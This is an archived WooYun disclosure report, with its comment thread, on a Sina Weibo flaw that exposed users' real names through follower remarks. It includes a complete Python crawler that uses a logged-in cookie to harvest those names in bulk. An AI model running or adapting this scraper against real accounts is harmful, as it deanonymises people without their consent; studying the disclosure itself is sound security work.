当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-089519

漏洞标题:如何通过微博在他人不知情的情况下获取其真实姓名(可批量获取)

相关厂商:新浪微博

漏洞作者: 肉肉

提交时间:2014-12-31 16:26

修复时间:2015-02-14 16:28

公开时间:2015-02-14 16:28

漏洞类型:账户体系控制不严

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-31: 细节已通知厂商并且等待厂商处理中
2015-01-01: 厂商已经确认,细节仅向厂商公开
2015-01-11: 细节向核心白帽子及相关领域专家公开
2015-01-21: 细节向普通白帽子公开
2015-01-31: 细节向实习白帽子公开
2015-02-14: 细节向公众公开

简要描述:

其实我在微博上也说了这个问题,但是被告知任性的产品经理觉得这是业务特性,真的好任性啊有没有,特性就是我玩个微博真实姓名就被泄露了吗?而且不是我自己提交的呀!!!你不经过我同意搜集我的信息也就罢了,你还展示出来,这么任性不怕挨打吗亲。
没啥技术含量,但是感觉危害挺大,小伙伴写代码也挺辛苦,就要个8rank吧,忽略也无所谓

详细说明:

发现这个问题很偶然,就是关注别人的时候,当达到一定条件(我觉得这种条件就是有一定量的共同关注,并不需要互相关注,这个一定量也不大。)就会自动显示别人给被关注者的备注(大部分时候是真名呀喂)

5.png


(因为flashsky的名字是公开的信息了所以就拿他做演示了)
后来有发现,我也不需要关注别人了,只要别人关注我我也能看到

新浪3.jpeg


这位同学对不起了啊
其实也不是全部都是真实姓名,但是爬了一下,发现爬出真实姓名的概率特别大呀。
这里是是程序

#!/usr/bin/env python
#coding:utf-8
import urllib,urllib2
import re,sys
import cookielib
import json
'''
1.入口
2.爬去一层
3.通过第一层的oid构造出第二层的共同关注url
4.爬取第二层
'''
#全局变量
##已经爬行过的路径
oidlist = set()
spiderlist = set()
global count
count = 0
headers={}
headers = {
        'Cookie': 这里添加你的cookie这里添加你的cookie哟,
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3',
        'DNT': 1,
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'http://weibo.com/m4njusaka?from=feed&loc=at&nick=%E8%82%89%E8%82%89%E8%A6%81%E5%A5%BD%E5%A5%BD%E5%86%99%E4%BB%A3%E7%A0%81&noscale_head=1'
        }
def get_name(content):
    try:
        name = []
        name = re.findall('CONFIG\[\'onick\'\]=\'(.*?)\'', content) 
        return name[0]
    except Exception,e:
        pass
def get_oid(content):
    try:
        oid =[]
        oid = re.findall('CONFIG\[\'oid\'\]=\'(.*?)\'', content) 
        return oid[0] 
    except Exception,e:
        pass
def get_real_name(user):
    real_name = []
    user['name'] = urllib.quote(user['name'])
    postdata = urllib.urlencode({
        'uid' : user['oid'],
        'objectid' : '',
        'f' : 1,
        'extra' : '',
        'refer_sort' : '',
        'refer_flag' : '',
        'location' : 'page_100505_home',
        'oid' : user['oid'],
        'wforce' : 1,
        'nogroup' : 'false',
        'fnick' : user['name'],
        '_t' : 0,
    })
    url = "http://weibo.com/aj/f/followed?ajwvr=6&__rnd=1419910508362"
    req = urllib2.Request(
                url = url,
                data = postdata,
                headers =headers
            )
    result = urllib2.urlopen(req).read()
    real_name = re.findall('"remark":"(.*?)"',result)
    if real_name:
        return real_name[0]
def get_urllist(url):
    cj = cookielib.LWPCookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)
    req = urllib2.Request(url, headers=headers) 
    response = urllib2.urlopen(req)
    content = response.read()
    url_list = re.findall(r'action-data=\\\"uid=(.*?)&fnick=(.*?)&.*?\\\">私信',content)
    return url_list
def get_page_sum(url):
    '''返回共同关注人页数'''
    req = urllib2.Request(url, headers=headers) 
    response = urllib2.urlopen(req)
    content = response.read()
    page = re.findall(r'page S_txt1',content)
    page_sum = len(page)
    return page_sum
def spider(depth, startURL):
    i = 0 
    if depth <= 0: 
       return 0
    else:
        url_list = get_urllist(startURL)
        if len(url_list) >0:
            for url in url_list:
                spider_url = "http://www.weibo.com/p/100505%s/follow?relate=same_follow" % url[0]
                sum_page = get_page_sum(spider_url)
                for page in range(1,sum_page):
                    spider_url = "http://www.weibo.com/p/100505%s/follow?relate=same_follow&page=%s" % (url[0], page)
                    target_url = "http://weibo.com/u/%s" % url[0]
                    if url[0] in oidlist:
                        continue
                    else:
                        spider(depth - 1, spider_url)
                        get_user(url[0])
                        oidlist.add(url[0])
def get_user(oid):
    url = "http://weibo.com/u/%s" % oid
    req = urllib2.Request(url, headers=headers) 
    response = urllib2.urlopen(req)
    content = response.read()
    user ={
        'name' : get_name(content),
        'oid' : get_oid(content),
        'real_name' : ''
    }
    user['real_name'] = get_real_name(user)
    print  user['oid'], urllib.unquote(user['name']), json.loads('{"test": "%s"}' % user['real_name'])['test']
def main():
    max_depth = 3
    '''开始爬行地址'''
    startURL = 'http://weibo.com/p/1005053191954357/follow?from=page_100505_profile&wvr=6&mod=modulerel'
    spider(max_depth, startURL)
main()


谢谢帮我写代码的小伙伴,元旦请你女票吃蛋糕去(*^__^*)

漏洞证明:

5.png


新浪3.jpeg


还有那个程序扫出来的结果我直接给piaca啦,就不帖这里了,感觉不大好,扫出来结果是基本上都有真实姓名的。如果那个产品经理还那么任性觉得这不是问题你们的名字被人扫出来了不要打我,去打他,我给你们说他是谁。

修复方案:

我也不知道怎么修,就是加强限制吧,或者给个开关让我自己来觉得是否要显示

版权声明:转载请注明来源 肉肉@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-01-01 20:19

厂商回复:

感谢关注新浪安全,此问题正在修复中。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-12-31 16:27 | 夏殇 ( 路人 | Rank:30 漏洞数:21 | 不忘初心,方得始终。)

    前排?目测要火?

  2. 2014-12-31 16:28 | 茜茜公主 ( 普通白帽子 | Rank:2360 漏洞数:406 | 家里二宝出生,这几个月忙着把屎把尿...忒...)

    真的好任性

  3. 2014-12-31 16:30 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    ........

  4. 2014-12-31 16:33 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    肉总要火

  5. 2014-12-31 16:35 | 岩少 ( 普通白帽子 | Rank:586 漏洞数:171 | 破晓团队)

    前排花生 瓜子。

  6. 2014-12-31 16:35 | Medea ( 路人 | Rank:29 漏洞数:4 | “记住,黑客行为不仅仅是犯罪。这是生存本...)

    肉肉就是任性--.

  7. 2014-12-31 16:36 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    肉肉是来打卡的

  8. 2014-12-31 16:36 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    顶肉肉

  9. 2014-12-31 16:39 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @浩天 我还活着

  10. 2014-12-31 16:50 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    吃了任性辣条就是这么任性

  11. 2014-12-31 16:54 | chock ( 实习白帽子 | Rank:58 漏洞数:15 | 今夜我们都是wooyun人,我们一定要收购长亭)

    挺肉肉

  12. 2014-12-31 16:56 | 小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老,学到老!)

    肉肉牌辣条,吃了就是任性!

  13. 2014-12-31 16:56 | 咸鱼翻身 ( 普通白帽子 | Rank:576 漏洞数:108 )

    好任性

  14. 2014-12-31 16:59 | Coffee ( 普通白帽子 | Rank:144 漏洞数:15 | Corie, a student of RDFZ.)

    肉肉v5

  15. 2014-12-31 16:59 | 命途多舛 ( 路人 | Rank:29 漏洞数:9 | 找不到漏洞啊!!!!)

    我是来看新浪妹子怎么处理的。

  16. 2014-12-31 17:00 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    这个肉肉是那个肉肉吗?

  17. 2014-12-31 17:10 | 码农 ( 路人 | Rank:2 漏洞数:1 | 爱肉肉~)

    肉肉嫁我~

  18. 2014-12-31 17:13 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    肉肉有洞就是任性

  19. 2014-12-31 17:25 | l137 ( 路人 | Rank:27 漏洞数:8 | 我叫mt)

    肉肉有洞就是任性

  20. 2014-12-31 17:30 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @wefgod 哪个肉肉?

  21. 2014-12-31 17:43 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    肉肉再次调皮

  22. 2014-12-31 18:05 | 小火苗 ( 路人 | Rank:6 漏洞数:1 | 我是一只小火苗呀,春风吹又生呀...)

    他跟你什么仇什么怨?

  23. 2014-12-31 18:20 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    吾皇万岁万岁万万岁,@新浪微博 8rank都不给的话,好坏好坏的!!!

  24. 2014-12-31 18:44 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @码农 核心白帽子都不是,不嫁

  25. 2014-12-31 18:58 | erevus ( 普通白帽子 | Rank:177 漏洞数:31 | Hacked by @ringzero 我錯了)

    健哥就是任性

  26. 2014-12-31 19:12 | roker ( 普通白帽子 | Rank:357 漏洞数:108 )

    吾皇万岁万岁万万岁,@新浪微博 8rank都不给的话,好坏好坏的!!!

  27. 2014-12-31 20:32 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    @肉肉 那爱妃也不是核心,能娶么......

  28. 2014-12-31 20:54 | cf_hb ( 普通白帽子 | Rank:119 漏洞数:17 | 爱生活,爱安全!)

    女神厉害!

  29. 2014-12-31 21:07 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    女神厉害!

  30. 2014-12-31 21:17 | 1c3z ( 实习白帽子 | Rank:88 漏洞数:29 | 我读书少,你可别骗我!!!)

    打卡

  31. 2014-12-31 21:58 | 雅柏菲卡 ( 普通白帽子 | Rank:1213 漏洞数:234 | 雙魚座聖鬥士雅柏菲卡)

    @肉肉 强势关注

  32. 2014-12-31 22:06 | 魂淡、 ( 路人 | Rank:17 漏洞数:2 | 么么哒)

    就是写个脚本跑微博名字么

  33. 2014-12-31 22:11 | 海绵宝宝 ( 普通白帽子 | Rank:243 漏洞数:50 | 唯有梦想与好姑娘不可辜负.)

    新浪 OUT

  34. 2014-12-31 22:21 | T0ne5 ( 路人 | Rank:2 漏洞数:1 | 搬砖真的很累。)

    Hello World,来WooYun第一天。

  35. 2014-12-31 23:06 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    跨年漏洞演出。

  36. 2014-12-31 23:39 | 你大爷在此 百无禁忌 ( 路人 | Rank:10 漏洞数:6 | Hello 各位小伙伴们 大家好 我是王尼玛)

    女神 跨年 也挖洞啊

  37. 2015-01-01 00:02 | s3xy ( 核心白帽子 | Rank:832 漏洞数:113 | 相濡以沫,不如相忘于江湖)

    跨年漏洞

  38. 2015-01-01 00:06 | 东方不败 ( 普通白帽子 | Rank:440 漏洞数:66 | 日出东方,唯我不败。)

    肉肉姐你太任性了。

  39. 2015-01-01 00:10 | ′雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

    求帮跑跑 王思聪微博 看看老公真实姓名叫啥。

  40. 2015-01-01 00:54 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    请给8rank,肉姐任性小心被拉黑。

  41. 2015-01-01 01:31 | 狗狗侠 ( 普通白帽子 | Rank:497 漏洞数:55 | 我是狗狗侠)

    别给肉肉打码,让他露

  42. 2015-01-01 08:14 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    我是来支持肉肉的

  43. 2015-01-01 08:34 | MuZhU0 ( 路人 | Rank:6 漏洞数:4 )

    肉肉女神!!!!!狂拽炫酷叼炸新浪!!!

  44. 2015-01-01 18:39 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    我来顶肉肉

  45. 2015-01-02 10:06 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    诶,确认了,是要修复的意思咩

  46. 2015-01-02 10:41 | 残废 ( 普通白帽子 | Rank:179 漏洞数:40 | 我是残废,啦啦啦啦)

    肉肉打他

  47. 2015-01-02 11:46 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    @肉肉 渣浪这是自己打自己的脸

  48. 2015-01-02 12:06 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    渣浪还是渣浪

  49. 2015-01-02 15:47 | 曾亦信 ( 路人 | Rank:4 漏洞数:1 | 探知新大陆,迷茫中寻求突破自我)

    你该要10 就给你8了

  50. 2015-01-03 18:45 | Mr丶Mario ( 路人 | Rank:11 漏洞数:2 | Hello World!)

    100块都不给我

  51. 2015-01-04 09:37 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    8rank都不给我!真抠!

  52. 2015-01-04 15:32 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @肉肉 拍写真的那个……

  53. 2015-01-04 15:39 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @wefgod 我没拍过写真诶

  54. 2015-01-04 15:48 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @肉肉 发写真的哈哈可以没

  55. 2015-01-05 09:02 | 码农 ( 路人 | Rank:2 漏洞数:1 | 爱肉肉~)

    @肉肉 好吧 等我核心!!!!

  56. 2015-01-05 19:40 | 233 ( 路人 | Rank:14 漏洞数:4 | 小孩子看了根本把持不住)

    肉肉V5

  57. 2015-01-21 16:46 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    居然写程序了

  58. 2015-01-22 22:26 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    qq这个玩意更明显。。

  59. 2015-01-29 23:54 | philipjones ( 路人 | Rank:10 漏洞数:6 | 漏洞菜鸟飘过,望大神们照顾。)

    3乌比,算了,还是等我再努力一把。。。

  60. 2015-01-31 21:13 | Smilent ( 实习白帽子 | Rank:34 漏洞数:6 | None)

    肉肉写得一手好代码

  61. 2015-02-01 06:05 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @肉肉 你的个性签名怎么跟我的网名一样

  62. 2015-02-01 19:24 | Arthur ( 实习白帽子 | Rank:77 漏洞数:33 | USA,I am coming!!!!!)

    最后那个莫非是王凯轮!!伟大的Helen?!

  63. 2015-03-08 19:04 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    其实很多人待在乌云是因为肉肉。

  64. 2015-03-13 21:49 | 魂淡、 ( 路人 | Rank:17 漏洞数:2 | 么么哒)

    觉得这个就只是服务特性,算不上漏洞

  65. 2015-04-13 18:04 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    肉肉姐,,,其实这个问题还是没修复。。。。。

  66. 2015-07-08 14:48 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    最后那个莫非是王凯轮!!